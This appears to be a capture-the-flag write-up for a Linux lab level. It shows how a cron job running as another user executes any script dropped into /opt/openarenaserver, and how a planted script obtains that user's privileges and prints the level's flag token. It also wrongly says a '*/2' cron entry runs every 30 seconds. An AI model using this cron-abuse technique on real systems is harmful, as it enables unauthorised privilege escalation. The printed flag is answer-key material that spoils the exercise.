Looking for file owned by `flag05` user.  
Command: `find / -group flag05  2>/dev/null`  
Output:
```
/usr/sbin/openarenaserver
/rofs/usr/sbin/openarenaserver
```
Command: `ls -l /usr/sbin/openarenaserver `  
Output:
```
-rwxr-x---+ 1 flag05 flag05 94 Mar  5  2016 /usr/sbin/openarenaserver
```
Command: `cat /usr/sbin/openarenaserver`  
Output:
```
#!/bin/sh

for i in /opt/openarenaserver/* ; do
        (ulimit -t 5; bash -x "$i")
        rm -f "$i"
done
```
As we can see, this file owned by `flag05` user and it contain shell script inside - wich iterate through all files inside `/opt/openarenaserver/` directory and execute them one by one.

But we are not allowed to run it directly - `Permission denied`.

Looking for files with `level05` name.  
Command: `find / -name level05 2>/dev/null`  
Output:
```
/var/mail/level05
/rofs/var/mail/level05
```

Command: `cat /var/mail/level05 `
```
*/2 * * * * su -c "sh /usr/sbin/openarenaserver" - flag05
```

So as we can see, that script is trigered by `cron` job every 30 seconds.  

So to get flag I've created `test.sh` script and put it inside `/opt/openarenaserver/`.
```
#!/bin/sh
getflag > /tmp/res
```
Command: `chmod 755 /opt/openarenaserver/test.sh`

Command: `cat /tmp/res`  
Output: `Check flag.Here is your token : viuaaale9huek52boumoomioc`

Flag: `viuaaale9huek52boumoomioc`